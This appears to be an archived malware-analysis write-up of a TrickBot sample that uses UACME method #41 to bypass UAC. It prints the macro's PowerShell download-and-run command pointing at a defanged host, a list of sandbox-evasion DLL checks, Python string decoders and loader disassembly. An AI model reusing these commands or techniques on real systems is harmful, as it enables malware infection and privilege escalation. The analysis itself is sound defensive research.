{
	"id": "e3eda40b-7f87-4a84-8306-98f6b8353854",
	"created_at": "2026-04-06T00:06:40.206081Z",
	"updated_at": "2026-04-10T13:11:25.651415Z",
	"deleted_at": null,
	"sha1_hash": "b468dd20dba589ca35827d289ab739b29a629f18",
	"title": "TrickBot \u0026 UACME",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 152354,
	"plain_text": "TrickBot \u0026 UACME\r\nPublished: 2018-04-16 · Archived: 2026-04-05 17:56:30 UTC\r\nTrickBot Secure Message Delivery 12apr2018\r\nDoc delivery: 3782f96c6d9f3136651da208465fa939313b7e4f21bdc4ef10c05926e0428a65\r\n'\"\" | Out-File -encoding ASCII -FilePath %TEMP%\\bpknnhvxb_cx.bat;Start-Process '%TEMP%\\bpknnhvxb_cx.bat' -WindowStyl\r\ncmd.exe /c \"\"%TEMP%\\bpknnhvxb_cx.bat\" \" (PID: 4568)\r\npowershell.exe PowerShell \"function ggft([String] $uibzkllsrb5)\r\n{(New-Object System.Net.WebClient).DownloadFile($uibzkllsrb5,'%TEMP%\\sethasn2.exe');Start-Process '%TEMP%\\sethasn2.ex\r\nm-tensou[.]net/svoren.png - 2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c\r\nMacro uses a custom string lookup\r\nVBA FORM STRING IN '3782f96c6d9f3136651da208465fa939313b.doc' - OLE stream: u'Macros/wordapollo/o'\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nqwertyuiop[]asdfghjkl;zxcvbnm,./QWERTYUIOP{}ASDFGHJKL:\"ZXCVBNM\u003c\u003e?!@#$%^\u0026*()\\1234567890 -|'\r\nk = \"\"\"qwertyuiop[]asdfghjkl;zxcvbnm,./QWERTYUIOP{}ASDFGHJKL:\"ZXCVBNM\u003c\u003e?!@#$%^\u0026*()\\1234567890 -|'\"\"\"\r\nblah = 'Qwou/ha[E/uoRh,aiu/Es/l'\r\nout = \"\"\r\nfor i in range(len(blah)):\r\n temp = k.index(blah[i])\r\n out += k[(temp-4)%len(k)]\r\nprint(out)\r\nTrick payload\r\n2153be5c6f73f4816d90809febf4122a7b065cbfddaa4e2bf5935277341af34c Sample has multiple internal layers on the\r\ncrypter along with a function decoding layer that decodes out each individual function as it needs it.\r\nChecks for the prescence of the following DLLs by parsing them from the PEB\r\npstorec.dll\r\nvmcheck.dll\r\ndbghelp.dll\r\nwpespy.dll\r\napi_log.dll\r\nSbieDll.dll\r\nSxIn.dll\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 1 of 21\n\ndir_watch.dll\r\nSf2.dll\r\ncmdvrt32.dll\r\nsnxhk.dll\r\nLoader Functions\r\nFunction that parses all unicode DLLs from PEB and then compares it with a passed in string\r\n01DB04AA 83EC 10 SUB ESP,10\r\n01DB04AD C745 F4 00000000 MOV DWORD PTR SS:[EBP-C],0\r\n01DB04B4 64:A1 30000000 MOV EAX,DWORD PTR FS:[30]\r\n01DB04BA 8945 F4 MOV DWORD PTR SS:[EBP-C],EAX\r\n01DB04BD C745 F8 00000000 MOV DWORD PTR SS:[EBP-8],0\r\n01DB04C4 C745 FC 00000000 MOV DWORD PTR SS:[EBP-4],0\r\n01DB04CB C745 F0 00000000 MOV DWORD PTR SS:[EBP-10],0\r\n01DB04D2 837D F4 00 CMP DWORD PTR SS:[EBP-C],0\r\n01DB04D6 74 5E JE SHORT 01DB0536\r\n01DB04D8 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]\r\n01DB04DB 8B51 0C MOV EDX,DWORD PTR DS:[ECX+C]\r\n01DB04DE 83C2 14 ADD EDX,14\r\n01DB04E1 8955 F8 MOV DWORD PTR SS:[EBP-8],EDX\r\n01DB04E4 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]\r\n01DB04E7 8B08 MOV ECX,DWORD PTR DS:[EAX]\r\n01DB04E9 894D FC MOV DWORD PTR SS:[EBP-4],ECX\r\n01DB04EC 837D F8 00 CMP DWORD PTR SS:[EBP-8],0\r\n01DB04F0 74 44 JE SHORT 01DB0536\r\n01DB04F2 837D FC 00 CMP DWORD PTR SS:[EBP-4],0\r\n01DB04F6 74 3E JE SHORT 01DB0536\r\n01DB04F8 8B55 F8 MOV EDX,DWORD PTR SS:[EBP-8]\r\n01DB04FB 3B55 FC CMP EDX,DWORD PTR SS:[EBP-4]\r\n01DB04FE 74 36 JE SHORT 01DB0536\r\n01DB0500 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\n01DB0503 83E8 08 SUB EAX,8\r\n01DB0506 8945 F0 MOV DWORD PTR SS:[EBP-10],EAX\r\n01DB0509 74 21 JE SHORT 01DB052C\r\n01DB050B 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]\r\n01DB050E 51 PUSH ECX\r\n01DB050F 8B55 F0 MOV EDX,DWORD PTR SS:[EBP-10]\r\n01DB0512 8B42 30 MOV EAX,DWORD PTR DS:[EDX+30]\r\n01DB0515 50 PUSH EAX\r\n01DB0516 6A 14 PUSH 14\r\n01DB0518 E8 BB0BFFFF CALL 01DA10D8\r\n01DB051D 83C4 08 ADD ESP,8\r\n01DB0520 85C0 TEST EAX,EAX\r\n01DB0522 74 08 JE SHORT 01DB052C\r\n01DB0524 8B4D F0 MOV ECX,DWORD PTR SS:[EBP-10]\r\n01DB0527 8B41 18 MOV EAX,DWORD PTR DS:[ECX+18]\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 2 of 21\n\n01DB052A EB 0C JMP SHORT 01DB0538\r\n01DB052C 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]\r\n01DB052F 8B02 MOV EAX,DWORD PTR DS:[EDX]\r\n01DB0531 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\r\n01DB0534 ^EB C2 JMP SHORT 01DB04F8\r\n01DB0536 33C0 XOR EAX,EAX\r\n01DB0538 8BE5 MOV ESP,EBP\r\n01DB053A 5D POP EBP\r\n01DB053B C3 RETN\r\nString decoding is base64 with a custom alphabet:\r\n01DA252C 8B4D E0 MOV ECX,DWORD PTR SS:[EBP-20]\r\n01DA252F 83E9 01 SUB ECX,1\r\n01DA2532 894D E0 MOV DWORD PTR SS:[EBP-20],ECX\r\n01DA2535 85C0 TEST EAX,EAX\r\n01DA2537 0F84 00010000 JE 01DA263D\r\n01DA253D 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]\r\n01DA2540 0355 F8 ADD EDX,DWORD PTR SS:[EBP-8]\r\n01DA2543 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\n01DA2546 8A0A MOV CL,BYTE PTR DS:[EDX]\r\n01DA2548 884C28 E4 MOV BYTE PTR DS:[EAX+EBP-1C],CL\r\n01DA254C 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]\r\n01DA254F 83C2 01 ADD EDX,1\r\n01DA2552 8955 FC MOV DWORD PTR SS:[EBP-4],EDX\r\n01DA2555 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]\r\n01DA2558 83C0 01 ADD EAX,1\r\n01DA255B 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX\r\n01DA255E 837D FC 04 CMP DWORD PTR SS:[EBP-4],4\r\n01DA2562 0F85 D0000000 JNZ 01DA2638\r\n01DA2568 C745 FC 00000000 MOV DWORD PTR SS:[EBP-4],0\r\n01DA256F EB 09 JMP SHORT 01DA257A\r\n01DA2571 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]\r\n01DA2574 83C1 01 ADD ECX,1\r\n01DA2577 894D FC MOV DWORD PTR SS:[EBP-4],ECX\r\n01DA257A 837D FC 04 CMP DWORD PTR SS:[EBP-4],4\r\n01DA257E 7D 42 JGE SHORT 01DA25C2\r\n01DA2580 C745 DC 00000000 MOV DWORD PTR SS:[EBP-24],0\r\n01DA2587 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C]\r\n01DA258A 0355 DC ADD EDX,DWORD PTR SS:[EBP-24]\r\n01DA258D 0FBE02 MOVSX EAX,BYTE PTR DS:[EDX]\r\n01DA2590 85C0 TEST EAX,EAX\r\n01DA2592 74 2C JE SHORT 01DA25C0\r\n01DA2594 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]\r\n01DA2597 034D DC ADD ECX,DWORD PTR SS:[EBP-24]\r\n01DA259A 0FBE11 MOVSX EDX,BYTE PTR DS:[ECX]\r\n01DA259D 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 3 of 21\n\n01DA25A0 0FBE4C28 E4 MOVSX ECX,BYTE PTR DS:[EAX+EBP-1C]\r\n01DA25A5 3BD1 CMP EDX,ECX\r\n01DA25A7 75 0C JNZ SHORT 01DA25B5\r\n01DA25A9 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]\r\n01DA25AC 8A45 DC MOV AL,BYTE PTR SS:[EBP-24]\r\n01DA25AF 88442A E4 MOV BYTE PTR DS:[EDX+EBP-1C],AL\r\n01DA25B3 EB 0B JMP SHORT 01DA25C0\r\n01DA25B5 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]\r\n01DA25B8 83C1 01 ADD ECX,1\r\n01DA25BB 894D DC MOV DWORD PTR SS:[EBP-24],ECX\r\n01DA25BE ^EB C7 JMP SHORT 01DA2587\r\n01DA25C0 ^EB AF JMP SHORT 01DA2571\r\n01DA25C2 0FBE55 E4 MOVSX EDX,BYTE PTR SS:[EBP-1C]\r\n01DA25C6 0FBE45 E5 MOVSX EAX,BYTE PTR SS:[EBP-1B]\r\n01DA25CA 83E0 30 AND EAX,30\r\n01DA25CD C1F8 04 SAR EAX,4\r\n01DA25D0 8D0C90 LEA ECX,DWORD PTR DS:[EAX+EDX*4]\r\n01DA25D3 884D EC MOV BYTE PTR SS:[EBP-14],CL\r\n01DA25D6 0FBE55 E5 MOVSX EDX,BYTE PTR SS:[EBP-1B]\r\n01DA25DA 83E2 0F AND EDX,0F\r\n01DA25DD C1E2 04 SHL EDX,4\r\n01DA25E0 0FBE45 E6 MOVSX EAX,BYTE PTR SS:[EBP-1A]\r\n01DA25E4 83E0 3C AND EAX,3C\r\n01DA25E7 C1F8 02 SAR EAX,2\r\n01DA25EA 03D0 ADD EDX,EAX\r\n01DA25EC 8855 ED MOV BYTE PTR SS:[EBP-13],DL\r\n01DA25EF 0FBE4D E6 MOVSX ECX,BYTE PTR SS:[EBP-1A]\r\n01DA25F3 83E1 03 AND ECX,3\r\n01DA25F6 C1E1 06 SHL ECX,6\r\n01DA25F9 0FBE55 E7 MOVSX EDX,BYTE PTR SS:[EBP-19]\r\n01DA25FD 03CA ADD ECX,EDX\r\n01DA25FF 884D EE MOV BYTE PTR SS:[EBP-12],CL\r\n01DA2602 C745 FC 00000000 MOV DWORD PTR SS:[EBP-4],0\r\n01DA2609 EB 09 JMP SHORT 01DA2614\r\n01DA260B 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]\r\n01DA260E 83C0 01 ADD EAX,1\r\n01DA2611 8945 FC MOV DWORD PTR SS:[EBP-4],EAX\r\n01DA2614 837D FC 03 CMP DWORD PTR SS:[EBP-4],3\r\n01DA2618 7D 17 JGE SHORT 01DA2631\r\n01DA261A 8B4D E8 MOV ECX,DWORD PTR SS:[EBP-18]\r\n01DA261D 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]\r\n01DA2620 8A442A EC MOV AL,BYTE PTR DS:[EDX+EBP-14]\r\n01DA2624 8801 MOV BYTE PTR DS:[ECX],AL\r\n01DA2626 8B4D E8 MOV ECX,DWORD PTR SS:[EBP-18]\r\n01DA2629 83C1 01 ADD ECX,1\r\n01DA262C 894D E8 MOV DWORD PTR SS:[EBP-18],ECX\r\n01DA262F ^EB DA JMP SHORT 01DA260B\r\n01DA2631 C745 FC 00000000 MOV DWORD PTR SS:[EBP-4],0\r\n01DA2638 ^E9 ECFEFFFF JMP 01DA2529\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 4 of 21\n\n01DA263D 837D FC 00 CMP DWORD PTR SS:[EBP-4],0\r\n01DA2641 0F84 F6000000 JE 01DA273D\r\n01DA2647 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]\r\n01DA264A 8955 DC MOV DWORD PTR SS:[EBP-24],EDX\r\n01DA264D EB 09 JMP SHORT 01DA2658\r\n01DA264F 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]\r\n01DA2652 83C0 01 ADD EAX,1\r\n01DA2655 8945 DC MOV DWORD PTR SS:[EBP-24],EAX\r\n01DA2658 837D DC 04 CMP DWORD PTR SS:[EBP-24],4\r\n01DA265C 7D 0A JGE SHORT 01DA2668\r\n01DA265E 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]\r\n01DA2661 C64429 E4 00 MOV BYTE PTR DS:[ECX+EBP-1C],0\r\n01DA2666 ^EB E7 JMP SHORT 01DA264F\r\n01DA2668 C745 DC 00000000 MOV DWORD PTR SS:[EBP-24],0\r\n01DA266F EB 09 JMP SHORT 01DA267A\r\n01DA2671 8B55 DC MOV EDX,DWORD PTR SS:[EBP-24]\r\n01DA2674 83C2 01 ADD EDX,1\r\n01DA2677 8955 DC MOV DWORD PTR SS:[EBP-24],EDX\r\n01DA267A 837D DC 04 CMP DWORD PTR SS:[EBP-24],4\r\n01DA267E 7D 49 JGE SHORT 01DA26C9\r\n01DA2680 C745 D4 00000000 MOV DWORD PTR SS:[EBP-2C],0\r\n01DA2687 C745 D8 4637DC01 MOV DWORD PTR SS:[EBP-28],1DC3746 ; ASCII \"56tAMJ1GmOs3TK20g4I+ueRbpwqjNBVxzynF7ha\r\n01DA268E 8B45 D8 MOV EAX,DWORD PTR SS:[EBP-28]\r\n01DA2691 0345 D4 ADD EAX,DWORD PTR SS:[EBP-2C]\r\n01DA2694 0FBE08 MOVSX ECX,BYTE PTR DS:[EAX]\r\n01DA2697 85C9 TEST ECX,ECX\r\n01DA2699 74 2C JE SHORT 01DA26C7\r\n01DA269B 8B55 D8 MOV EDX,DWORD PTR SS:[EBP-28]\r\n01DA269E 0355 D4 ADD EDX,DWORD PTR SS:[EBP-2C]\r\n01DA26A1 0FBE02 MOVSX EAX,BYTE PTR DS:[EDX]\r\n01DA26A4 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]\r\n01DA26A7 0FBE5429 E4 MOVSX EDX,BYTE PTR DS:[ECX+EBP-1C]\r\n01DA26AC 3BC2 CMP EAX,EDX\r\n01DA26AE 75 0C JNZ SHORT 01DA26BC\r\n01DA26B0 8B45 DC MOV EAX,DWORD PTR SS:[EBP-24]\r\n01DA26B3 8A4D D4 MOV CL,BYTE PTR SS:[EBP-2C]\r\n01DA26B6 884C28 E4 MOV BYTE PTR DS:[EAX+EBP-1C],CL\r\n01DA26BA EB 0B JMP SHORT 01DA26C7\r\n01DA26BC 8B55 D4 MOV EDX,DWORD PTR SS:[EBP-2C]\r\n01DA26BF 83C2 01 ADD EDX,1\r\n01DA26C2 8955 D4 MOV DWORD PTR SS:[EBP-2C],EDX\r\n01DA26C5 ^EB C7 JMP SHORT 01DA268E\r\n01DA26C7 ^EB A8 JMP SHORT 01DA2671\r\n01DA26C9 0FBE45 E4 MOVSX EAX,BYTE PTR SS:[EBP-1C]\r\n01DA26CD 0FBE4D E5 MOVSX ECX,BYTE PTR SS:[EBP-1B]\r\n01DA26D1 83E1 30 AND ECX,30\r\n01DA26D4 C1F9 04 SAR ECX,4\r\n01DA26D7 8D1481 LEA EDX,DWORD PTR DS:[ECX+EAX*4]\r\n01DA26DA 8855 EC MOV BYTE PTR SS:[EBP-14],DL\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 5 of 21\n\n01DA26DD 0FBE45 E5 MOVSX EAX,BYTE PTR SS:[EBP-1B]\r\n01DA26E1 83E0 0F AND EAX,0F\r\n01DA26E4 C1E0 04 SHL EAX,4\r\n01DA26E7 0FBE4D E6 MOVSX ECX,BYTE PTR SS:[EBP-1A]\r\n01DA26EB 83E1 3C AND ECX,3C\r\n01DA26EE C1F9 02 SAR ECX,2\r\n01DA26F1 03C1 ADD EAX,ECX\r\n01DA26F3 8845 ED MOV BYTE PTR SS:[EBP-13],AL\r\n01DA26F6 0FBE55 E6 MOVSX EDX,BYTE PTR SS:[EBP-1A]\r\n01DA26FA 83E2 03 AND EDX,3\r\n01DA26FD C1E2 06 SHL EDX,6\r\n01DA2700 0FBE45 E7 MOVSX EAX,BYTE PTR SS:[EBP-19]\r\n01DA2704 03D0 ADD EDX,EAX\r\n01DA2706 8855 EE MOV BYTE PTR SS:[EBP-12],DL\r\n01DA2709 C745 DC 00000000 MOV DWORD PTR SS:[EBP-24],0\r\n01DA2710 EB 09 JMP SHORT 01DA271B\r\n01DA2712 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]\r\n01DA2715 83C1 01 ADD ECX,1\r\n01DA2718 894D DC MOV DWORD PTR SS:[EBP-24],ECX\r\n01DA271B 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]\r\n01DA271E 83EA 01 SUB EDX,1\r\n01DA2721 3955 DC CMP DWORD PTR SS:[EBP-24],EDX\r\n01DA2724 7D 17 JGE SHORT 01DA273D\r\n01DA2726 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18]\r\n01DA2729 8B4D DC MOV ECX,DWORD PTR SS:[EBP-24]\r\n01DA272C 8A5429 EC MOV DL,BYTE PTR DS:[ECX+EBP-14]\r\n01DA2730 8810 MOV BYTE PTR DS:[EAX],DL\r\n01DA2732 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18]\r\n01DA2735 83C0 01 ADD EAX,1\r\n01DA2738 8945 E8 MOV DWORD PTR SS:[EBP-18],EAX\r\n01DA273B ^EB D5 JMP SHORT 01DA2712\r\n01DA273D 8B4D E8 MOV ECX,DWORD PTR SS:[EBP-18]\r\n01DA2740 C601 00 MOV BYTE PTR DS:[ECX],0\r\n01DA2743 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18]\r\n01DA2746 2B45 0C SUB EAX,DWORD PTR SS:[EBP+C]\r\n01DA2749 8BE5 MOV ESP,EBP\r\n01DA274B 5D POP EBP\r\n01DA274C C3 RETN\r\nimport base64\r\ndata = 'N8yhj1fiTnY7j1f\\x00jr47j1fPw1oL\\x00N8yLB8JfqIY7j1f\\x00pR48pb6STimPw1oL\\x00gFpZ\\x00Tg\\x00Tz\\x00N/wFq1ciBtYhV1u\r\nkey = '56tAMJ1GmOs3TK20g4I+ueRbpwqjNBVxzynF7hardSDEL9PvfoXiZl8/HYUCQckW'\r\nstd_b64 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\nfor s in data.split('\\x00'):\r\n s = s.translate(str.maketrans(key,std_b64))\r\n if len(s)%4 != 0:\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 6 of 21\n\ns += '='*(4 - len(s)%4)\r\n print(base64.b64decode(s))\r\nb'shell32.dll'\r\nb'ntdll.dll'\r\nb'shlwapi.dll'\r\nb'advapi32.dll'\r\nb'B64'\r\nb'1'\r\nb'2'\r\nb'svchost.exe'\r\nb'\\\\NetViewer'\r\nb'pstorec.dll'\r\nb'vmcheck.dll'\r\nb'dbghelp.dll'\r\nb'wpespy.dll'\r\nb'api_log.dll'\r\nb'SbieDll.dll'\r\nb'SxIn.dll'\r\nb'dir_watch.dll'\r\nb'Sf2.dll'\r\nb'cmdvrt32.dll'\r\nb'snxhk.dll'\r\nb'MSEDGE'\r\nb'IEUser'\r\nb'SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\'\r\nb'ProductName'\r\nb'Evaluation'\r\nb'SOFTWARE\\\\Microsoft\\\\Virtual Machine'\r\nb'{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'\r\nb'{6EDD6D74-C007-4E75-B76A-E5740995E24C}'\r\nb'explorer.exe'\r\nb'bloody booty bla de bludy botty bla lhe capitaine bloode!'\r\nb'ole32.dll'\r\nb'wtsapi32'\r\nb'WTSEnumerateSessionsA'\r\nb'WTSFreeMemory'\r\nb'WTSGetActiveConsoleSessionId'\r\nb'WTSQueryUserToken'\r\nb'SeTcbPrivilege'\r\nb'Elevation:Administrator!new:'\r\nb'.log'\r\nChecks if local system\r\nhttps://github.com/hfiref0x/UACME/blob/b8c4c71e1ba3b6646a48c0b655ce6d6e388c6112/Source/Shared/util.c\r\n status = RtlAllocateAndInitializeSid(\r\n \u0026SECURITY_NT_AUTHORITY,\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 7 of 21\n\n1,\r\n SECURITY_LOCAL_SYSTEM_RID,\r\n 0, 0, 0, 0, 0, 0, 0,\r\n\u0026SystemSid);\r\nAlso some strings based on UACME #41, which was reported on by F-secure in December of last year[1]. Around the\r\nsame time #41 was also added to IcedId in late November of 2017[2]\r\nIf SID not matches then it checks if it’s running out of %AppData%. If not then it checks if it’s running out of system32\r\nor else it copies itself over to %AppData% into a NetViewer folder after slightly manipulating it’s filename in the\r\nprocess. Afterwords it checks what elevation level it is running at by using similar code as supGetElevationType from\r\nUACME[5]. If it’s executing as TokenElevationTypeLimited then it moves into using #41 from UACME.\r\nI let it run all the way up until it was about to call ShellExec on the COM object and then changed the malicious binary\r\nlocation with cmd.exe for a pretty picture:\r\nIf that lines up then a XOR encoded compressed PE file is decoded out using the same encoding routine used on the\r\nfunctions.\r\nNext it’s decompressed using LZO, the code used matches up with the code that was utilized by Dyreza but since code\r\nshare has already been found it wouldn’t be abnormal for them to reuse libraries they already had on hand. Appears to\r\nbe from MiniLZO but a common compression library so hard to tell specifically. Also of note is the same\r\ndecompression routine is utilized to decompress the loader bytecode as well.\r\nDecompression code:\r\n01DB31DE 57 PUSH EDI\r\n01DB31DF 56 PUSH ESI\r\n01DB31E0 53 PUSH EBX\r\n01DB31E1 51 PUSH ECX\r\n01DB31E2 52 PUSH EDX\r\n01DB31E3 83EC 0C SUB ESP,0C\r\n01DB31E6 FC CLD\r\n01DB31E7 8B7424 28 MOV ESI,DWORD PTR SS:[ESP+28]\r\n01DB31EB 8B7C24 30 MOV EDI,DWORD PTR SS:[ESP+30]\r\n01DB31EF BD 03000000 MOV EBP,3\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 8 of 21\n\n01DB31F4 31C0 XOR EAX,EAX\r\n01DB31F6 31DB XOR EBX,EBX\r\n01DB31F8 AC LODS BYTE PTR DS:[ESI]\r\n01DB31F9 3C 11 CMP AL,11\r\n01DB31FB 76 1B JBE SHORT 01DB3218\r\n01DB31FD 2C 0E SUB AL,0E\r\n01DB31FF EB 22 JMP SHORT 01DB3223\r\n01DB3201 05 FF000000 ADD EAX,0FF\r\n01DB3206 8A1E MOV BL,BYTE PTR DS:[ESI]\r\n01DB3208 46 INC ESI\r\n01DB3209 08DB OR BL,BL\r\n01DB320B ^74 F4 JE SHORT 01DB3201\r\n01DB320D 8D4418 15 LEA EAX,DWORD PTR DS:[EAX+EBX+15]\r\n01DB3211 EB 10 JMP SHORT 01DB3223\r\n01DB3213 89F6 MOV ESI,ESI\r\n01DB3215 8A06 MOV AL,BYTE PTR DS:[ESI]\r\n01DB3217 46 INC ESI\r\n01DB3218 3C 10 CMP AL,10\r\n01DB321A 73 41 JNB SHORT 01DB325D\r\n01DB321C 08C0 OR AL,AL\r\n01DB321E ^74 E6 JE SHORT 01DB3206\r\n01DB3220 83C0 06 ADD EAX,6\r\n01DB3223 89C1 MOV ECX,EAX\r\n01DB3225 31E8 XOR EAX,EBP\r\n01DB3227 C1E9 02 SHR ECX,2\r\n01DB322A 21E8 AND EAX,EBP\r\n01DB322C 8B16 MOV EDX,DWORD PTR DS:[ESI]\r\n01DB322E 83C6 04 ADD ESI,4\r\n01DB3231 8917 MOV DWORD PTR DS:[EDI],EDX\r\n01DB3233 83C7 04 ADD EDI,4\r\n01DB3236 49 DEC ECX\r\n01DB3237 ^75 F3 JNZ SHORT 01DB322C\r\n01DB3239 29C6 SUB ESI,EAX\r\n01DB323B 29C7 SUB EDI,EAX\r\n01DB323D 8A06 MOV AL,BYTE PTR DS:[ESI]\r\n01DB323F 46 INC ESI\r\n01DB3240 3C 10 CMP AL,10\r\n01DB3242 73 19 JNB SHORT 01DB325D\r\n01DB3244 C1E8 02 SHR EAX,2\r\n01DB3247 8A1E MOV BL,BYTE PTR DS:[ESI]\r\n01DB3249 8D97 FFF7FFFF LEA EDX,DWORD PTR DS:[EDI-801]\r\n01DB324F 8D0498 LEA EAX,DWORD PTR DS:[EAX+EBX*4]\r\n01DB3252 46 INC ESI\r\n01DB3253 29C2 SUB EDX,EAX\r\n01DB3255 8B0A MOV ECX,DWORD PTR DS:[EDX]\r\n01DB3257 890F MOV DWORD PTR DS:[EDI],ECX\r\n01DB3259 01EF ADD EDI,EBP\r\n01DB325B EB 6E JMP SHORT 01DB32CB\r\n01DB325D 3C 40 CMP AL,40\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 9 of 21\n\n01DB325F 72 34 JB SHORT 01DB3295\r\n01DB3261 89C1 MOV ECX,EAX\r\n01DB3263 C1E8 02 SHR EAX,2\r\n01DB3266 8D57 FF LEA EDX,DWORD PTR DS:[EDI-1]\r\n01DB3269 83E0 07 AND EAX,7\r\n01DB326C 8A1E MOV BL,BYTE PTR DS:[ESI]\r\n01DB326E C1E9 05 SHR ECX,5\r\n01DB3271 8D04D8 LEA EAX,DWORD PTR DS:[EAX+EBX*8]\r\n01DB3274 46 INC ESI\r\n01DB3275 29C2 SUB EDX,EAX\r\n01DB3277 83C1 04 ADD ECX,4\r\n01DB327A 39E8 CMP EAX,EBP\r\n01DB327C 73 35 JNB SHORT 01DB32B3\r\n01DB327E EB 6D JMP SHORT 01DB32ED\r\n01DB3280 05 FF000000 ADD EAX,0FF\r\n01DB3285 8A1E MOV BL,BYTE PTR DS:[ESI]\r\n01DB3287 46 INC ESI\r\n01DB3288 08DB OR BL,BL\r\n01DB328A ^74 F4 JE SHORT 01DB3280\r\n01DB328C 8D4C18 24 LEA ECX,DWORD PTR DS:[EAX+EBX+24]\r\n01DB3290 31C0 XOR EAX,EAX\r\n01DB3292 EB 0D JMP SHORT 01DB32A1\r\n01DB3294 90 NOP\r\n01DB3295 3C 20 CMP AL,20\r\n01DB3297 72 74 JB SHORT 01DB330D\r\n01DB3299 83E0 1F AND EAX,1F\r\n01DB329C ^74 E7 JE SHORT 01DB3285\r\n01DB329E 8D48 05 LEA ECX,DWORD PTR DS:[EAX+5]\r\n01DB32A1 66:8B06 MOV AX,WORD PTR DS:[ESI]\r\n01DB32A4 8D57 FF LEA EDX,DWORD PTR DS:[EDI-1]\r\n01DB32A7 C1E8 02 SHR EAX,2\r\n01DB32AA 83C6 02 ADD ESI,2\r\n01DB32AD 29C2 SUB EDX,EAX\r\n01DB32AF 39E8 CMP EAX,EBP\r\n01DB32B1 72 3A JB SHORT 01DB32ED\r\n01DB32B3 8D440F FD LEA EAX,DWORD PTR DS:[EDI+ECX-3]\r\n01DB32B7 C1E9 02 SHR ECX,2\r\n01DB32BA 8B1A MOV EBX,DWORD PTR DS:[EDX]\r\n01DB32BC 83C2 04 ADD EDX,4\r\n01DB32BF 891F MOV DWORD PTR DS:[EDI],EBX\r\n01DB32C1 83C7 04 ADD EDI,4\r\n01DB32C4 49 DEC ECX\r\n01DB32C5 ^75 F3 JNZ SHORT 01DB32BA\r\n01DB32C7 89C7 MOV EDI,EAX\r\n01DB32C9 31DB XOR EBX,EBX\r\n01DB32CB 8A46 FE MOV AL,BYTE PTR DS:[ESI-2]\r\n01DB32CE 21E8 AND EAX,EBP\r\n01DB32D0 ^0F84 3FFFFFFF JE 01DB3215\r\n01DB32D6 8B16 MOV EDX,DWORD PTR DS:[ESI]\r\nhttps://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html\r\nPage 10 of 21\n\n01DB32D8 01C6 ADD ESI,EAX\r\n01DB32DA 8917 MOV DWORD PTR DS:[EDI],EDX\r\n01DB32DC 01C7 ADD EDI,EAX\r\n01DB32DE 8A06 MOV AL,BYTE PTR DS:[ESI]\r\n01DB32E0 46 INC ESI\r\n01DB32E1 ^E9 77FFFFFF JMP 01DB325D\r\n01DB32E6 8DB426 00000000 LEA ESI,DWORD PTR DS:[ESI]\r\n01DB32ED 87D6 XCHG ESI,EDX\r\n01DB32EF 29E9 SUB ECX,EBP\r\n01DB32F1 F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[\u003e\r\n01DB32F3 89D6 MOV ESI,EDX\r\n01DB32F5 ^EB D4 JMP SHORT 01DB32CB\r\n01DB32F7 81C1 FF000000 ADD ECX,0FF\r\n01DB32FD 8A1E MOV BL,BYTE PTR DS:[ESI]\r\n01DB32FF 46 INC ESI\r\n01DB3300 08DB OR BL,BL\r\n01DB3302 ^74 F3 JE SHORT 01DB32F7\r\n01DB3304 8D4C0B 0C LEA ECX,DWORD PTR DS:[EBX+ECX+C]\r\n01DB3308 EB 17 JMP SHORT 01DB3321\r\n01DB330A 8D76 00 LEA ESI,DWORD PTR DS:[ESI]\r\n01DB330D 3C 10 CMP AL,10\r\n01DB330F 72 2C JB SHORT 01DB333D\r\n01DB3311 89C1 MOV ECX,EAX\r\n01DB3313 83E0 08 AND EAX,8\r\n01DB3316 C1E0 0D SHL EAX,0D\r\n01DB3319 83E1 07 AND 